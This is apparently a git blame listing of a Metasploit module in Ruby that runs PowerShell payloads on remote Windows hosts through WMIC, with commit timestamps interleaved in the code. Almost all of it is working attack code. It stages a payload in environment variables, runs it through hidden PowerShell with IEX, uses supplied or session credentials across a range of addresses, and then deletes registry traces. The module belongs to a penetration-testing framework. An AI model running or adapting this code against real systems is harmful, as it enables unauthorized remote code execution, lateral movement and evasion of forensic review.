2013-09-20 12:40:28 +00:00
|
|
|
##
|
2013-10-30 20:14:16 +00:00
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2013-09-20 12:40:28 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
2013-10-26 02:41:24 +00:00
|
|
|
require 'msf/core/exploit/powershell'
|
2013-09-20 12:40:28 +00:00
|
|
|
require 'rex'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Local
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Powershell
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
2013-09-20 16:18:14 +00:00
|
|
|
'Name' => 'Windows Management Instrumentation (WMI) Remote Command Execution',
|
2013-09-20 12:40:28 +00:00
|
|
|
'Description' => %q{
|
2013-09-20 16:18:14 +00:00
|
|
|
This module executes powershell on the remote host using the current
|
|
|
|
user credentials or those supplied. Instead of using PSEXEC over TCP
|
|
|
|
port 445 we use the WMIC command to start a Remote Procedure Call on
|
2013-09-20 17:36:24 +00:00
|
|
|
TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel
|
|
|
|
traffic through that session.
|
2013-09-20 12:40:28 +00:00
|
|
|
|
|
|
|
The result is similar to psexec but with the added benefit of using
|
|
|
|
the session's current authentication token instead of having to know
|
|
|
|
a password or hash.
|
2013-09-20 16:18:14 +00:00
|
|
|
|
|
|
|
We do not get feedback from the WMIC command so there are no
|
|
|
|
indicators of success or failure. The remote host must be configured
|
|
|
|
to allow remote Windows Management Instrumentation.
|
2013-09-20 12:40:28 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [
|
2013-09-20 16:18:14 +00:00
|
|
|
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'
|
2013-09-20 12:40:28 +00:00
|
|
|
],
|
2013-09-20 16:18:14 +00:00
|
|
|
'References' =>
|
|
|
|
[
|
2013-09-20 12:40:28 +00:00
|
|
|
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
|
|
|
|
[ 'OSVDB', '3106'],
|
2013-09-20 16:18:14 +00:00
|
|
|
[ 'URL', 'http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html' ],
|
2013-09-20 12:40:28 +00:00
|
|
|
],
|
2013-09-20 16:18:14 +00:00
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'thread',
|
|
|
|
'WfsDelay' => '15',
|
|
|
|
},
|
2013-09-20 12:40:28 +00:00
|
|
|
'DisclosureDate' => 'Jan 01 1999',
|
|
|
|
'Platform' => [ 'win' ],
|
|
|
|
'SessionTypes' => [ 'meterpreter' ],
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
|
|
|
|
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
|
|
|
|
],
|
|
|
|
'DefaultTarget' => 0
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options([
|
2013-09-20 16:18:14 +00:00
|
|
|
OptString.new('SMBUser', [ false, 'The username to authenticate as' ]),
|
|
|
|
OptString.new('SMBPass', [ false, 'The password for the specified username' ]),
|
|
|
|
OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication' ]),
|
|
|
|
OptAddressRange.new("RHOSTS", [ true, "Target address range or CIDR identifier" ]),
|
2013-09-20 17:36:24 +00:00
|
|
|
# Move this out of advanced
|
|
|
|
OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener'])
|
2013-09-20 12:40:28 +00:00
|
|
|
])
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
2013-09-20 16:18:14 +00:00
|
|
|
if datastore['SMBUser'] and datastore['SMBPass'].nil?
|
|
|
|
fail_with(Failure::BadConfig, "Need both username and password set.")
|
|
|
|
end
|
|
|
|
|
|
|
|
Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
|
2013-09-20 17:36:24 +00:00
|
|
|
# TODO: CHECK WMIC Access by reading the clipboard?
|
|
|
|
# TODO: wmic /output:clipboard
|
|
|
|
# TODO: Needs to be meterpreter ext side due to threading
|
|
|
|
|
2013-09-20 16:18:14 +00:00
|
|
|
# Get the PSH Payload and split it into bitesize chunks
|
|
|
|
# 1024 appears to be the max value allowed in env vars
|
|
|
|
psh = cmd_psh_payload(payload.encoded).gsub("\r\n","")
|
|
|
|
psh = psh[psh.index("$si")..psh.length-1]
|
|
|
|
chunks = split_code(psh, 1024)
|
|
|
|
|
2013-09-20 18:33:27 +00:00
|
|
|
begin
|
|
|
|
print_status("[#{server}] Storing payload in environment variables")
|
|
|
|
env_name = rand_text_alpha(rand(3)+3)
|
|
|
|
env_vars = []
|
|
|
|
0.upto(chunks.length-1) do |i|
|
|
|
|
env_vars << "#{env_name}#{i}"
|
|
|
|
c = "cmd /c SETX #{env_vars[i]} \"#{chunks[i]}\" /m"
|
|
|
|
wmic_command(server, c)
|
|
|
|
end
|
|
|
|
|
2013-09-20 19:31:14 +00:00
|
|
|
x = rand_text_alpha(rand(3)+3)
|
|
|
|
exec_cmd = "powershell.exe -nop -w hidden -c $#{x} = ''"
|
2013-09-20 18:33:27 +00:00
|
|
|
env_vars.each do |env|
|
|
|
|
exec_cmd << "+$env:#{env}"
|
|
|
|
end
|
2013-09-20 19:31:14 +00:00
|
|
|
exec_cmd << ";IEX $#{x};"
|
2013-09-20 18:33:27 +00:00
|
|
|
|
|
|
|
print_status("[#{server}] Executing payload")
|
|
|
|
wmic_command(server, exec_cmd)
|
|
|
|
|
|
|
|
print_status("[#{server}] Cleaning up environment variables")
|
|
|
|
env_vars.each do |env|
|
|
|
|
cleanup_cmd = "cmd /c REG delete \"HKLM\\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f"
|
|
|
|
wmic_command(server, cleanup_cmd)
|
|
|
|
end
|
|
|
|
rescue Rex::Post::Meterpreter::RequestError => e
|
|
|
|
print_error("[#{server}] Error moving on... #{e}")
|
|
|
|
next
|
|
|
|
ensure
|
|
|
|
select(nil,nil,nil,2)
|
2013-09-20 16:18:14 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def wmic_user_pass_string(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])
|
|
|
|
userpass = ""
|
|
|
|
|
|
|
|
unless user.nil?
|
|
|
|
if domain.nil?
|
|
|
|
userpass = "/user:\"#{user}\" /password:\"#{pass}\" "
|
|
|
|
else
|
|
|
|
userpass = "/user:\"#{domain}\\#{user}\" /password:\"#{pass}\" "
|
2013-09-20 12:40:28 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2013-09-20 16:18:14 +00:00
|
|
|
return userpass
|
|
|
|
end
|
|
|
|
|
|
|
|
def wmic_command(server, cmd)
|
|
|
|
wcmd = "wmic #{wmic_user_pass_string}/node:#{server} process call create \"#{cmd.gsub('"','\\"')}\""
|
|
|
|
vprint_status("[#{server}] #{wcmd}")
|
|
|
|
|
|
|
|
# We dont use cmd_exec as WMIC cannot be Channelized
|
|
|
|
ps = session.sys.process.execute(wcmd, "", {'Hidden' => true, 'Channelized' => false})
|
2013-09-20 18:33:27 +00:00
|
|
|
select(nil,nil,nil,0.1)
|
2013-09-20 16:18:14 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def split_code(psh, chunk_size)
|
|
|
|
array = []
|
|
|
|
idx = 0
|
|
|
|
while (idx < psh.length)
|
|
|
|
array << psh[idx, chunk_size]
|
|
|
|
idx += chunk_size
|
|
|
|
end
|
|
|
|
return array
|
2013-09-20 12:40:28 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|